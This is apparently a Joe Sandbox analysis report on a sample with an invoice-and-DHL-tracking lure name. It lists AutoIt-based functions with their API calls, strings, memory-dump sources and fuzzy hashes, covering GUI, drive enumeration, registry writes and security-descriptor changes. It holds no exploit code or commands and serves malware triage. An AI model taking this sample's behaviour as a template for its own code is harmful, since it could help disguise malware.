Function 00418D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00418E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00456AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00456AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00456F43

Part of subcall function 00418F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00418BE8,?,00000000,?,?,?,?,00418BBA,00000000,?), ref: 00418FC5

SendMessageW.USER32(?,00001053), ref: 00456F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00456F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00456FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00456FB7

Strings

0, xrefs: 00456DCF

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: c4e1d079e7feecc1f0c7021be5bb067e54142e6e8afc53484fab5642190c1190
Instruction ID: e9b540a01f17715450491459bb1486a3ac7e1ecb175c7ce654376cd1565cf959
Opcode Fuzzy Hash: c4e1d079e7feecc1f0c7021be5bb067e54142e6e8afc53484fab5642190c1190
Instruction Fuzzy Hash: 7812AC70601211AFDB21CF14C894BA6B7F5FB45302F95446FE885CB262CB39AC9ACB59

Function 00482711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0048273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0048286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 004828A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004828B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00482900
GetClientRect.USER32(00000000,?), ref: 0048290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00482955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482964
GetStockObject.GDI32(00000011), ref: 00482974
SelectObject.GDI32(00000000,00000000), ref: 00482978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00482988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00482991
DeleteDC.GDI32(00000000), ref: 0048299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004829C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 004829DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00482A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00482A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00482A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00482A77
GetStockObject.GDI32(00000011), ref: 00482A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00482A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00482A97

Strings

msctls_progress32, xrefs: 00482A13
static, xrefs: 0048294F, 00482A71
AutoIt v3, xrefs: 004828F8
DISPLAY, xrefs: 0048295A

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 75e675519c1aedcc4f22a6906d58bc5e48459ae5d838ab3ec349a53c673adf86
Instruction ID: e9ade11dab0fe2af951de518d2c42dc0868fb73828cf1c45992ce1b7dabbae1d
Opcode Fuzzy Hash: 75e675519c1aedcc4f22a6906d58bc5e48459ae5d838ab3ec349a53c673adf86
Instruction Fuzzy Hash: 9CB16F71A00215BFEB14DF69CD85FAE7BA9EB08714F00452AF915E72E0D774AD40CBA8

Function 00474ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00474AED
GetDriveTypeW.KERNEL32(?,0049CB68,?,\\.\,0049CC08), ref: 00474BCA
SetErrorMode.KERNEL32(00000000,0049CB68,?,\\.\,0049CC08), ref: 00474D36

Strings

FileBackedVirtual, xrefs: 00474CEC
SATA, xrefs: 00474CD0
Unknown, xrefs: 00474BED, 00474C83
PhysicalDrive, xrefs: 00474B76
SSD, xrefs: 00474C4A
SSA, xrefs: 00474CA6
iSCSI, xrefs: 00474CC2
Virtual, xrefs: 00474CE5
Fixed, xrefs: 00474C09
RAID, xrefs: 00474CBB
ATA, xrefs: 00474C98
CDROM, xrefs: 00474BFB
Fibre, xrefs: 00474CAD
SAS, xrefs: 00474CC9
ATAPI, xrefs: 00474C91
1394, xrefs: 00474C9F
Removable, xrefs: 00474C10, 00474C15
RAMDisk, xrefs: 00474BF4
SCSI, xrefs: 00474C8A
USB, xrefs: 00474CB4
\\.\, xrefs: 00474B3F
Network, xrefs: 00474C02
MMC, xrefs: 00474CDE

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: ab80831dd2eb253968ff5bd395b14728ef159c1b25e70c5eac400577a6d6c2f3
Instruction ID: 0ac9adffbc1f8b7afb3ae8515e1ade7549d640cd2c15dac342cbcd9624f2b695
Opcode Fuzzy Hash: ab80831dd2eb253968ff5bd395b14728ef159c1b25e70c5eac400577a6d6c2f3
Instruction Fuzzy Hash: 6361B2356051059FCB05DF24CA81EF977A0AB84344B26C02BE80BAB691DB3DED42DB5E

Function 004973E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00497421
SetTextColor.GDI32(?,?), ref: 00497425
GetSysColorBrush.USER32(0000000F), ref: 0049743B
GetSysColor.USER32(0000000F), ref: 00497446
CreateSolidBrush.GDI32(?), ref: 0049744B
GetSysColor.USER32(00000011), ref: 00497463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00497471
SelectObject.GDI32(?,00000000), ref: 00497482
SetBkColor.GDI32(?,00000000), ref: 0049748B
SelectObject.GDI32(?,?), ref: 00497498
InflateRect.USER32(?,000000FF,000000FF), ref: 004974B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004974CE
GetWindowLongW.USER32(00000000,000000F0), ref: 004974DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0049752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00497554
InflateRect.USER32(?,000000FD,000000FD), ref: 00497572
DrawFocusRect.USER32(?,?), ref: 0049757D
GetSysColor.USER32(00000011), ref: 0049758E
SetTextColor.GDI32(?,00000000), ref: 00497596
DrawTextW.USER32(?,004970F5,000000FF,?,00000000), ref: 004975A8
SelectObject.GDI32(?,?), ref: 004975BF
DeleteObject.GDI32(?), ref: 004975CA
SelectObject.GDI32(?,?), ref: 004975D0
DeleteObject.GDI32(?), ref: 004975D5
SetTextColor.GDI32(?,?), ref: 004975DB
SetBkColor.GDI32(?,?), ref: 004975E5

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 1195c3c338048cde382ca9e06bec7546f8486f8a3f5afba851761c3510aa3d87
Instruction ID: 809f5c748247be305c2d038453bd7a4f80c17b766ea098e9d8b68210fc43f4d9
Opcode Fuzzy Hash: 1195c3c338048cde382ca9e06bec7546f8486f8a3f5afba851761c3510aa3d87
Instruction Fuzzy Hash: 7E613D72904218BFDF019FA4DC89EAE7FB9EB09320F114136F915AB2A1D7759940CF98

Function 00490FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00491128
GetDesktopWindow.USER32 ref: 0049113D
GetWindowRect.USER32(00000000), ref: 00491144
GetWindowLongW.USER32(?,000000F0), ref: 00491199
DestroyWindow.USER32(?), ref: 004911B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004911ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0049120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0049121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00491232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00491245
IsWindowVisible.USER32(00000000), ref: 004912A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 004912BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 004912D0
GetWindowRect.USER32(00000000,?), ref: 004912E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0049130E
GetMonitorInfoW.USER32(00000000,?), ref: 00491328
CopyRect.USER32(?,?), ref: 0049133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 004913AA

Strings

0, xrefs: 004910D3
tooltips_class32, xrefs: 004911E6
(, xrefs: 0049131B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 2df0520ea53f781151155a9dccb26768136dc9de2785cb82424ff2f6e4428622
Instruction ID: 4fa3465cd89e115d083a00c14f180ab48255e67d4e67e6ea643bc7373abc173c
Opcode Fuzzy Hash: 2df0520ea53f781151155a9dccb26768136dc9de2785cb82424ff2f6e4428622
Instruction Fuzzy Hash: 63B18C71604341AFDB10DF65C885A5BBBE4FF88354F00892EF999AB2A1C735EC44CB99

Function 00490241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004902E5
_wcslen.LIBCMT ref: 0049031F
_wcslen.LIBCMT ref: 00490389
_wcslen.LIBCMT ref: 004903F1
_wcslen.LIBCMT ref: 00490475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004904C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00490504

Part of subcall function 0041F9F2: _wcslen.LIBCMT ref: 0041F9FD

Part of subcall function 0046223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00462258
Part of subcall function 0046223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0046228A

Strings

GETSELECTED, xrefs: 004905E1
VIEWCHANGE, xrefs: 00490675
GETITEMCOUNT, xrefs: 00490316, 00490337
GETSUBITEMCOUNT, xrefs: 00490384, 0049039F
ISSELECTED, xrefs: 004904DD
SELECTCLEAR, xrefs: 0049052D
SELECTINVERT, xrefs: 0049057E
GETTEXT, xrefs: 004903EC, 00490407
GETSELECTEDCOUNT, xrefs: 00490470, 0049048B
SELECTALL, xrefs: 00490515
DESELECT, xrefs: 0049059C
SELECT, xrefs: 00490548
FINDITEM, xrefs: 00490627

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: b3078c2079efdba59c02469cbec69a3e9f01576e3346aea7aeeede21f83beaad
Instruction ID: 9a54775b287b5774c99644f3016330cb526a800e56de7245beb016a960f4771f
Opcode Fuzzy Hash: b3078c2079efdba59c02469cbec69a3e9f01576e3346aea7aeeede21f83beaad
Instruction Fuzzy Hash: D4E1B2312082019FCB14DF25C95092BBBE5BFC8758B14457EF896AB391DB38ED46CB4A

Function 00418891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00418968
GetSystemMetrics.USER32(00000007), ref: 00418970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0041899B
GetSystemMetrics.USER32(00000008), ref: 004189A3
GetSystemMetrics.USER32(00000004), ref: 004189C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004189E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004189F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00418A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00418A3C
GetClientRect.USER32(00000000,000000FF), ref: 00418A5A
GetStockObject.GDI32(00000011), ref: 00418A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00418A81

Part of subcall function 0041912D: GetCursorPos.USER32(?), ref: 00419141
Part of subcall function 0041912D: ScreenToClient.USER32(00000000,?), ref: 0041915E
Part of subcall function 0041912D: GetAsyncKeyState.USER32(00000001), ref: 00419183
Part of subcall function 0041912D: GetAsyncKeyState.USER32(00000002), ref: 0041919D

SetTimer.USER32(00000000,00000000,00000028,004190FC), ref: 00418AA8

Strings

AutoIt v3 GUI, xrefs: 00418A20

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 9b22b474b8465658301ac0bcbc4df9570785728c239dcb6a9251e847d7526efb
Instruction ID: 24350be98dd57b743f4a3dd19b60f581808337178d510593da20842267799206
Opcode Fuzzy Hash: 9b22b474b8465658301ac0bcbc4df9570785728c239dcb6a9251e847d7526efb
Instruction Fuzzy Hash: CBB16F71600209AFDB14DFA8CC95BEE7BB5FB48315F11422BFE1597290DB38A841CB59

Function 00460D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00461114
Part of subcall function 004610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00460B9B,?,?,?), ref: 00461120
Part of subcall function 004610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00460B9B,?,?,?), ref: 0046112F
Part of subcall function 004610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00460B9B,?,?,?), ref: 00461136
Part of subcall function 004610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0046114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00460DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00460E29
GetLengthSid.ADVAPI32(?), ref: 00460E40
GetAce.ADVAPI32(?,00000000,?), ref: 00460E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00460E96
GetLengthSid.ADVAPI32(?), ref: 00460EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00460EB5
HeapAlloc.KERNEL32(00000000), ref: 00460EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00460EDD
CopySid.ADVAPI32(00000000), ref: 00460EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00460F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00460F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00460F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00460F6E
HeapFree.KERNEL32(00000000), ref: 00460F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00460F7E
HeapFree.KERNEL32(00000000), ref: 00460F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00460F8E
HeapFree.KERNEL32(00000000), ref: 00460F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00460FA1
HeapFree.KERNEL32(00000000), ref: 00460FA8

Part of subcall function 00461193: GetProcessHeap.KERNEL32(00000008,00460BB1,?,00000000,?,00460BB1,?), ref: 004611A1
Part of subcall function 00461193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00460BB1,?), ref: 004611A8
Part of subcall function 00461193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00460BB1,?), ref: 004611B7

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 45c2a3535d20612bdbd0e9ab5ee118db897ba99b8e4ba87040f1d0bb3022ba22
Instruction ID: 0fb3ce4afe998c41078967e3b78393224d602ba31502d030620368beac206456
Opcode Fuzzy Hash: 45c2a3535d20612bdbd0e9ab5ee118db897ba99b8e4ba87040f1d0bb3022ba22
Instruction Fuzzy Hash: 92717B7290020AABDF209FA5DC85BAFBBB8BF15300F044126F919A6291E775DD05CB69

Function 0048C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0048C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0049CC08,00000000,?,00000000,?,?), ref: 0048C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0048C5A4
_wcslen.LIBCMT ref: 0048C5F4
_wcslen.LIBCMT ref: 0048C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0048C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0048C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0048C84D
RegCloseKey.ADVAPI32(?), ref: 0048C881
RegCloseKey.ADVAPI32(00000000), ref: 0048C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0048C960

Strings

REG_QWORD, xrefs: 0048C8C3
REG_BINARY, xrefs: 0048C913
REG_EXPAND_SZ, xrefs: 0048C5CD
REG_SZ, xrefs: 0048C644
REG_DWORD, xrefs: 0048C804
REG_MULTI_SZ, xrefs: 0048C6F5

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 6ff89c77b89d335e935a70a66716c50b0bb9a0ae14573bfd1fb04df1e85b7c2a
Instruction ID: c2a433ac3ef539583300f68ceb4562f11c5db710a61bc91a506c5d7cd8db0dd2
Opcode Fuzzy Hash: 6ff89c77b89d335e935a70a66716c50b0bb9a0ae14573bfd1fb04df1e85b7c2a
Instruction Fuzzy Hash: 541271356042019FD714EF15C881E2AB7E5EF88758F14886EF8499B3A2DB39FC41CB99

Function 0049091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004909C6
_wcslen.LIBCMT ref: 00490A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00490A54
_wcslen.LIBCMT ref: 00490A8A
_wcslen.LIBCMT ref: 00490B06
_wcslen.LIBCMT ref: 00490B81

Part of subcall function 0041F9F2: _wcslen.LIBCMT ref: 0041F9FD

Part of subcall function 00462BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00462BFA

Strings

EXPAND, xrefs: 00490BF8
GETSELECTED, xrefs: 00490C4E
COLLAPSE, xrefs: 00490B01, 00490B1C
GETITEMCOUNT, xrefs: 00490C1E
UNCHECK, xrefs: 00490D3E
GETTOTALCOUNT, xrefs: 004909F2, 00490A17
SELECT, xrefs: 00490D11
CHECK, xrefs: 00490A85, 00490AA0
GETTEXT, xrefs: 00490C97
EXISTS, xrefs: 00490B7C, 00490B97
ISCHECKED, xrefs: 00490CE1

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 7f0726da428d1f857e1947c38dbf15062f352fe45e50e90fc4be6ee75e981708
Instruction ID: 1013c0651a9dba8fe5b30329448c2a67b3bcb7d5d7144e3293d99a1aa7eccc76
Opcode Fuzzy Hash: 7f0726da428d1f857e1947c38dbf15062f352fe45e50e90fc4be6ee75e981708
Instruction Fuzzy Hash: A0E1B2752083019FCB14DF25C45096ABBE1BF94358F10896EF8966B3A2D738ED45CB8A

Function 0048C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0048B6AE,?,?), ref: 0048C9B5
_wcslen.LIBCMT ref: 0048C9F1
_wcslen.LIBCMT ref: 0048CA68
_wcslen.LIBCMT ref: 0048CA9E
_wcslen.LIBCMT ref: 0048CAF9
_wcslen.LIBCMT ref: 0048CB2F
_wcslen.LIBCMT ref: 0048CB7F

Strings

HKCR, xrefs: 0048CB29, 0048CB2E
HKU, xrefs: 0048CBF0
HKEY_CLASSES_ROOT, xrefs: 0048CAF3, 0048CAF8
HKEY_USERS, xrefs: 0048CBDF
HKCC, xrefs: 0048CBAC
HKEY_LOCAL_MACHINE, xrefs: 0048CA62, 0048CA67
HKLM, xrefs: 0048CA98, 0048CA9D
HKEY_CURRENT_USER, xrefs: 0048CBBD
